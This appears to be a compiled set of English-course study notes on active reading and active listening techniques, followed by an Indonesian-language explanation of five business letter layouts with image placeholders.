Effective reading is active reading. To turn reading from a passive into an active exercise, always ask questions.
To do this, you must be clear about the purpose of your reading. If you are reading a text which you will be critiquing in detail, your questions will be different from those you would ask if you were reading a number of texts for background information. The object of the preview and questioning steps is to determine the writer’s thesis, that is, her/his main idea and purpose in writing.
 
3. Take notes
Some reasons for taking notes are:
• to maintain attentiveness as you read,
• to focus your attention,
• to familiarize yourself with primary and secondary material on a given subject,
• to analyze the assumptions and rhetorical strategies of the writer,
• to provide you with a summary of the material.
Some hints for taking notes:
• Always record bibliographical details of the text from which you are taking notes.
• Write on one side of the paper only.
• Leave a wide margin for comments and cross-references.
• Use headings, subheadings, and diagrams.
• Keep notes brief but full enough to still make sense to you in six months’ time. Make sure they’re legible.

4. Summaries
A summary is a collation of your notes, recording the main points the writer makes. Making a summary from your notes has two main benefits.
• It allows you to test yourself on your understanding of the material you have been reading – sometimes it is only when you try to put the writer’s ideas into your own words that you uncover difficulties.
• It provides you with a compact account of the text for further reference.

5. Review and reflect
To capitalize fully on the time you’ve spent reading an article or chapter, it’s important to review and reflect upon what you’ve read. This enhances your understanding and helps you to commit important facts and ideas to your long-term memory.
Here are some review and reflection exercises you may find useful:
• Test your understanding of the material by trying to answer your preview questions without referring to your notes.
• Write down the meaning and usefulness the material has for understanding other concepts and principles. Indicate what other ideas the material substantiates, contradicts, or amplifies.
• Evaluate the text in terms of its in formativeness, soundness of argument, relevance, and so on. If you are gathering material for an essay or report, decide which points you want to use and think about how you can use them.
• Start a reading journal in which you keep all reading, review, and reflection notes.

d. Reading Strategies
- Transfer: This means using ideas that you already have to make learning easier. For example, if you know that a paragraph (like a hamburger) usually has an introduction, a middle containing supporting detail, and a conclusion, you can use this knowledge to skim (read very quickly, by missing out non-important information, to understand the general topic) a text because you know that you only have to read the introduction and conclusion of both the whole text and the paragraphs.
- Translation: You can read a story in a newspaper in your own language first, and then read the same story in an English newspaper. Most of the story will probably be the same, so the story in your own language will help you to prepare for reading in English. For example, it will give you vocabulary, and when you read the English story and there is some vocabulary that you don’t know, and then you can use your knowledge of the story to guess what the new vocabulary is.
- Inferencing: You can also use the strategy of reading a newspaper story in your own language first for prediction. You can predict the contents of the same story in an English newspaper. Reading to confirm your predictions is easier than reading with no background information. Click here for more information on reading newspapers.
- Prediction: As well as predicting from newspaper stories in your own language, you can predict from your knowledge of the world, you knowledge of how people think, write and talk, and your knowledge of what the writer is like. For example, if you are reading a book it is a good idea to read about the author and the contents (on the cover or at the front of the book) to help you make predictions about what he or she believes


1. Listening
a. Approach for Listening
The Listening Skills Assessment helps people see that their preferred listening approach may not be appropriate to every situation.
Effective listening approach
The listening approach I recommend is generally known as ‘active listening’. When we provide training or consulting services, we remind people that they learn far more with their ears open than with their mouth open. We encourage people to ask questions, after all the only dumb questions are the ones you don’t ask.
In effect, active listening requires holding on to your own self-control and focusing on what other parties are saying. Don’t sit there fuming waiting for a chance to zap them when they finally shut up. Paying attention to their points and emphases gives you a clearer idea of what is really important to them, what their interests are.
b. Methods of Listening
Modern methods of teaching listening skills encompass everything from interactive exercises to multimedia resources. Listening skills are best learned through simple, engaging activities that focus more on the learning process than on the final product. Whether you are working with a large group of students or a small one, you can use any of the following examples to develop your own methods for teaching students how to listen well.
Audio Segments
o You can also teach listening skills through audio segments of radio programs, online podcasts, instructional lectures and other audio messages. You should model this interactive listening process in class with your students, and then instruct them to repeat the exercise on their own. First, instruct students to prepare for listening by considering anything that they will want to learn from the content of the audio segment. Once they have written down or shared these ideas, then play the audio segment, allowing the students to take notes if helpful. Once they have gained confidence and experience, repeat this activity but instruct students to not take notes until the completion of the audio segment. You can use shorter or longer audio segments, and you can choose more accessible or more challenging material for this type of exercise.
Video Segments
o Another helpful resource for teaching listening skills are video segments, including short sketches, news programs, documentary films, interview segments, and dramatic and comedic material. As with audio segments, select the portion and length of the video segment based on the skill level of your students. With your students, first watch the segment without any sound and discuss it together. Encourage the students to identify what they think will be the content of the segment. Then, watch the segment again, this time with sound, allowing students to take notes if helpful for their skill level. After the completion of the video segment, you can have students write a brief summary of the segment, or you can take time to discuss as a group how the segment compares with the students’ expectations.

c. Techniques for Listening
Effective Listening
Effective listening can be defined as the process, in which a person understands, interprets and analyzes the information received through hearing. Effective or active listening skills are not only useful in understanding verbal speech, but also enable a person to derive conclusions from the speaker’s body language. Such type of effective listening in the workplace helps in reducing conflicts and develops an atmosphere where cooperation is possible. Let us have a look at the effective listening activities which help in improving the communication. Read more on active listening activities.
Effective Listening Techniques
Effective listening skills/techniques include four basic activities viz., encouraging, paraphrasing, reflecting feelings, and summarizing. Let us understand in detail the importance of these effective listening activities.
Encouraging
It is the technique through which the speaker is encouraged to continue talking. The expressions like “I see” are generally used in this activity. The technique of ‘encouraging’ is an effective way to reinforce the speaker’s belief that one is listening to him keenly. It also helps the speaker understand which part of his speech is being appreciated and helps him elaborate on that particular topic.
Paraphrasing
In this process, the words spoken by the speaker are presented by the listener in different words. The benefit of paraphrasing is that the speaker gets positive feedback and ensures that whatever he has spoken is being understood by the listener. This prompts the speaker to proceed further and stops him from repeating the same statement more than once.
Reflecting the Feelings
The activity of reflecting the feelings is similar to paraphrasing. In paraphrasing feedback about the meaning of words is given, while the feelings underlying the words are reflected in this activity; identification and sorting of the speaker’s feelings is carried out in this process. If one is listening to a client, reflecting the feelings helps the speaker understand that one empathizes with his feelings; it encourages the speaker to proceed.
Summarizing
As the name suggests, this activity involves summarizing the sentences of the speaker. It is somewhat similar to paraphrasing except for the fact that summarizing provides a complete and comprehensive feedback.

d. Listening Strategies
-Physical Response: You can listen to instructions about how to do something, and follow the instructions. Relating sounds to movements helps you remember the sounds. So does listening to the sounds many times and repeating the movements. For example you can buy an English fitness video and listen and follow the instructions, and get fit at the same time.
- Prediction: You can predict what someone is going to say by the topic of the conversation and your knowledge of that person’s opinions. Listening to confirm what you predict is easier than listening and trying to understand everything.
- Preparation: you can listen to the news in your own language, then listen to it in English. Listening in your own language will help to predict what topics and vocabulary will be in the English news. Click here for the BBC news in English.
- Motivate yourself: for example if you like movies or music, you can practise listening to
Practice – Watch and listen to video clips of Goldsmiths lectures to practise your listening and note-taking skills.
Listening for Meaning
To extract meaning from a listening text, students need to follow four basic steps:
• Figure out the purpose for listening. Activate background knowledge of the topic in order to predict or anticipate content and identify appropriate listening strategies.
• Attend to the parts of the listening input that are relevant to the identified purpose and ignore the rest. This selectivity enables students to focus on specific items in the input and reduces the amount of information they have to hold in short-term memory in order to recognize it.
• Select top-down and bottom-up strategies that are appropriate to the listening task and use them flexibly and interactively. Students’ comprehension improves and their confidence increases when they use top-down and bottom-up strategies simultaneously to construct meaning.
• Check comprehension while listening and when the listening task is over. Monitoring comprehension helps students detect inconsistencies and comprehension failures, directing them to use alternate strategies.













1. Indented style
                                   

indented%2Bstyle 


KETERANGAN:
1.      Letter Head
2.      Reference Line
3.      Date Line
4.      Inside Address
5.      Attention Line
6.      Salutation
7.      Subject Line
8.      Body
9.      Complementary Close
10.  Name And Signature
11.  Enclosure
12.  Copy Carbon Natation
13.  Postscript

Format paragrafnya sama dengan Semiblock style, yang berbeda penulisan alamat dengan surat lainnya, cara penulisan alamat
pada Indented style diletakan di sebelah kanan, seperti yang terlihat pada gambar. Bentuk semacam ini cocok untuk surat yang
alamat tujuannya singkat.

2. Fullblock style                                                  


Full%2Bblock%2BstyleKETERANGAN:
1.      Letter Head
2.      Reference Line
3.      Date Line
4.      Inside Address
5.      Attention Line
6.      Salutation
7.      Subject Line
8.      Body
9.      Complementary Close
10.  Name And Signature
11.  Enclosure
12.  Copy Carbon Natation
13.  Postscript

Mempunyai bentuk lurus penuh, yaitu rata pada sisi kiri, dan juga style yang sering digunakan dalam menulis surat bisnis.
Jarak baris pada sisi surat diberi jarak satu baris, dan dua baris untuk jarak paragraf. Bentuk surat seperti ini adalah bentuk
surat yang paling mudah dari gaya surat lainya.

3. Block style

Block%2Bstyle


KETERANGAN:
1.      Letter Head
2.      Reference Line
3.      Date Line
4.      Inside Address
5.      Attention Line
6.      Salutation
7.      Subject Line
8.      Body
9.      Complementary Close
10.  Name And Signature
11.  Enclosure
12.  Copy Carbon Notation
13.  Postscript


Yang membedakan surat ini dengan surat Fullblock style adalah penempatan tanggal, tanda tangan, serta beberapa bagian
surat lainnya ditempatkan di sebelah kanan. Pada umumnya bentuk semacam ini banyak digunakan di perusahaan














 4. Semiblock  style

Semi%2Bblock%2BstyleKeterangan

1.      Letter Head
2.      Reference Line
3.      Date Line
4.      Inside Address
5.      Attention Line
6.      Salutation
7.      Subject Line
8.      Body
9.      Complementary Close
10.  Name And Signature
11.  Enclosure
12.  Copy Carbon Notation
13.  Postscript



Bentuk setengah lurus yang hampir mirip dengan penulisan surat Block style, yang berbeda pada surat ini ada pada bagian isi surat, yaitu pada paragrafnya, dimana masing-masing paragraf baru diberi jarak.

5. Hanging style


Hangging%2Bparagraf                
            KETERANGAN:
1.      Letter Head
2.      Reference Line
3.      Date Line
4.      Inside Address
5.      Attention Line
6.      Salutation
7.      Subject Line
8.      Body
9.      Complementary Close
10.  Name And Signature
11.  Enclosure
12.  Copy Carbon Natation
13.  Postscript

Bentuk alinea menggantung dan paragraf yang lebih condong kekiri.